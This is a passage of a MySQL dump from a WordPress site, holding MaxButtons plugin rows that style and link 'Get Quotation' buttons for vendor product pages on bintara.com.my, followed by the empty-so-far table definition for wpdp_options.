Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1572314074\",\"modified\":1572315957,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-29 02:25:57','2019-10-28 17:54:34'),(9,'Get Quotation Belkin','publish','.maxbutton-9.maxbutton.maxbutton-get-quotation-belkin{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-9.maxbutton.maxbutton-get-quotation-belkin:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-9.maxbutton.maxbutton-get-quotation-belkin .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-9.maxbutton.maxbutton-get-quotation-belkin:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Belkin\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-belkin\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545377431,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-20 23:29:53'),(10,'Get Quotation Broadbase','publish','.maxbutton-10.maxbutton.maxbutton-get-quotation-broadbase{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-10.maxbutton.maxbutton-get-quotation-broadbase:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-10.maxbutton.maxbutton-get-quotation-broadbase .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-10.maxbutton.maxbutton-get-quotation-broadbase:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Broadbase\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-broadbase\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545379675,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-21 00:05:11'),(11,'Get Quotation Canon','publish','.maxbutton-11.maxbutton.maxbutton-get-quotation-canon{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-11.maxbutton.maxbutton-get-quotation-canon:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-11.maxbutton.maxbutton-get-quotation-canon .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-11.maxbutton.maxbutton-get-quotation-canon:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Canon\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-canon\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545622020,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-23 19:18:00'),(12,'Get Quotation EPSON','publish','.maxbutton-12.maxbutton.maxbutton-get-quotation-epson{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-12.maxbutton.maxbutton-get-quotation-epson:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-12.maxbutton.maxbutton-get-quotation-epson .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-12.maxbutton.maxbutton-get-quotation-epson:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation EPSON\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-epson\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545632538,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-23 22:19:30'),(13,'Get Quotation HPE','publish','.maxbutton-13.maxbutton.maxbutton-get-quotation-hpe{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-13.maxbutton.maxbutton-get-quotation-hpe:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-13.maxbutton.maxbutton-get-quotation-hpe .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-13.maxbutton.maxbutton-get-quotation-hpe:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation HPE\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-hpe\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1545636540,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2018-12-23 23:28:39'),(14,'Get Quotation Jabra Evolve','publish','.maxbutton-14.maxbutton.maxbutton-get-quotation-jabra-evolve{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-14.maxbutton.maxbutton-get-quotation-jabra-evolve:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-14.maxbutton.maxbutton-get-quotation-jabra-evolve .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-14.maxbutton.maxbutton-get-quotation-jabra-evolve:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Jabra Evolve\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-jabra-evolve\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1544494144\",\"modified\":1549528996,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-25 07:02:30','2019-02-07 00:39:59'),(16,'Get Quotation Dell Large Display','publish','.maxbutton-16.maxbutton.maxbutton-get-quotation-dell-large-display{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-16.maxbutton.maxbutton-get-quotation-dell-large-display:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-16.maxbutton.maxbutton-get-quotation-dell-large-display .mb-text{color:#fff;font-family:Arial;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-16.maxbutton.maxbutton-get-quotation-dell-large-display:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Dell Large Display\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-dell\\/\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Arial\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1572314074\",\"modified\":1572315957,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-10-31 01:45:05','2019-10-30 17:45:05'),(17,'Get Quotation Targus','publish','.maxbutton-17.maxbutton.maxbutton-get-quotation-targus{position:relative;text-decoration:none;display:inline-block;vertical-align:middle;border-color:#1e73be;width:160px;height:50px;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-style:solid;border-width:2px;background-color:rgba(30, 115, 190, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-17.maxbutton.maxbutton-get-quotation-targus:hover{border-color:#1e73be;background-color:rgba(255, 255, 255, 1);-webkit-box-shadow:0px 0px 2px 0px #333;-moz-box-shadow:0px 0px 2px 0px #333;box-shadow:0px 0px 2px 0px #333}.maxbutton-17.maxbutton.maxbutton-get-quotation-targus .mb-text{color:#fff;font-family:Tahoma;font-size:17px;text-align:center;font-style:normal;font-weight:bold;padding-top:18px;padding-right:0px;padding-bottom:0px;padding-left:0px;line-height:1em;box-sizing:border-box;display:block;background-color:unset}.maxbutton-17.maxbutton.maxbutton-get-quotation-targus:hover .mb-text{color:#1e73be}','{\"name\":\"Get Quotation Targus\",\"status\":\"publish\",\"description\":\"\",\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-targus\",\"link_title\":\"\",\"new_window\":0,\"nofollow\":0}','{\"text_color\":\"#ffffff\",\"text_shadow_color\":\"#505ac7\",\"gradient_start_color\":\"#1e73be\",\"gradient_end_color\":\"#505ac7\",\"border_color\":\"#1e73be\",\"box_shadow_color\":\"#333333\",\"text_color_hover\":\"#1e73be\",\"text_shadow_color_hover\":\"#333333\",\"gradient_start_color_hover\":\"#ffffff\",\"gradient_end_color_hover\":\"#ffffff\",\"border_color_hover\":\"#1e73be\",\"box_shadow_color_hover\":\"#333333\",\"icon_color\":\"#ffffff\",\"icon_color_hover\":\"#2b469e\"}','{\"button_width\":160,\"button_height\":50}','{\"radius_top_left\":4,\"radius_top_right\":4,\"radius_bottom_left\":4,\"radius_bottom_right\":4,\"border_style\":\"solid\",\"border_width\":2,\"box_shadow_offset_left\":0,\"box_shadow_offset_top\":0,\"box_shadow_width\":2,\"box_shadow_spread\":0}','{\"gradient_stop\":\"45\",\"gradient_start_opacity\":\"100\",\"gradient_end_opacity\":\"100\",\"gradient_start_opacity_hover\":\"100\",\"gradient_end_opacity_hover\":\"100\",\"use_gradient\":\"0\"}','{\"text\":\"Get Quotation\",\"font\":\"Tahoma\",\"font_size\":17,\"text_align\":\"center\",\"font_style\":\"normal\",\"font_weight\":\"bold\",\"text_shadow_offset_left\":0,\"text_shadow_offset_top\":0,\"text_shadow_width\":0,\"padding_top\":18,\"padding_right\":0,\"padding_bottom\":0,\"padding_left\":0}','{\"container_enabled\":\"0\",\"container_center_div_wrap\":\"0\",\"container_width\":0,\"container_margin_top\":0,\"container_margin_right\":0,\"container_margin_bottom\":0,\"container_margin_left\":0,\"container_alignment\":\"\"}','{\"important_css\":\"0\",\"custom_rel\":\"\",\"extra_classes\":\"\",\"external_css\":\"0\"}','{\"media_query\":[],\"auto_responsive\":0}','{\"created\":\"1572486631\",\"modified\":1572926274,\"user_created\":\"pentadbirweb\",\"user_modified\":\"pentadbirweb\",\"created_source\":\"editor\",\"user_edited\":\"true\",\"in_collections\":[],\"is_virtual\":\"\"}','2019-11-05 03:57:54','2019-10-30 17:50:31');
/*!40000 ALTER TABLE `wpdp_maxbuttonsv3` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_options`
--

DROP TABLE IF EXISTS `wpdp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=MyISAM AUTO_INCREMENT=61439 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_options`
--

LOCK TABLES `wpdp_options` WRITE;
/*!40000 ALTER TABLE `wpdp_options` DISABLE KEYS */;
